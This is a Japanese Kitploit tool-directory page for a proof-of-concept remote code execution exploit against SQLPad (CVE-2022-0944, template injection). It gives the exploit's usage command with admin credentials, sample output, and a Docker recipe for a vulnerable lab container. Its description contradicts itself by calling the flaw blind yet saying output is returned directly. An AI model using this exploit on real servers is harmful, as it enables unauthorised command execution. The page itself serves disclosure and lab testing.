Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-0944 — SQLPad - テンプレートインジェクション(SQLPad RCE [CVE-2022-0944] 用のPOCエクスプロイト) | Kitploit
ツール/GitHubGitHub/flojboj/cve-2022-0944
脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育
GitHubflojboj/cve-2022-0944

CVE-2022-0944

SQLPad - テンプレートインジェクション(SQLPad RCE [CVE-2022-0944] 用のPOCエクスプロイト)

リポジトリを見る
51年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-0944

SQLPad - テンプレートインジェクション

これはブラインド脆弱性であり、出力がレスポンスに直接返されることを意味します。

エクスプロイト

次のコマンドでスクリプトを使用してください:
python3 exploit.py --url http://localhost:13000 --command 'ls -la > /tmp/test' --username admin --password password

出力

root@kitploit:~
[*] Login was successfull
[*] Exploited!

テスト環境

Dockerを使用する場合:

  • dockerコンテナを起動 - sudo docker run -p 13000:3000 -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=password --name vulnerable-sqlpad sqlpad/sqlpad:6.10.0
  • dockerコンテナに接続 - sudo docker exec -it vulnerable-sqlpad /bin/bash

Webインターフェースにアクセスするには、URL http://localhost:13000 を資格情報 admin:password で使用します。

影響を受けるバージョン

<= 6.10.0

ソース

https://huntr.com/bounties/46630727-d923-4444-a421-537ecd63e7fb

免責事項

教育目的またはCTFチャレンジにのみ使用してください。

ツールをダウンロード